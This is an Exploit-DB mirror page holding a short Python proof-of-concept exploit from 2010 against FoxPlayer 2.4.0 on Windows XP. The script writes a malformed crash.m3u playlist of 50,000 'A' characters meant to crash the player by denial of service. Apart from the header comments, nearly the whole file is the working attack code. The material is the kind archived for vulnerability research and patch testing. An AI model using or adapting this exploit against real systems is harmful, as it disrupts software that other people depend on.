exploit-db-mirror/exploits/windows/dos/15632.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
502 B
Python
Executable file

# Exploit Title: FoxPlayer 2.4.0 (.m3u) Denial of Service
# Date: 30 / 11 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.foxmediatools.com/installers/fox-player-setup.exe
# Version: v2.4.0
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version of FoxPlayer from the official website.. The version is v2.4.0
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 50000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()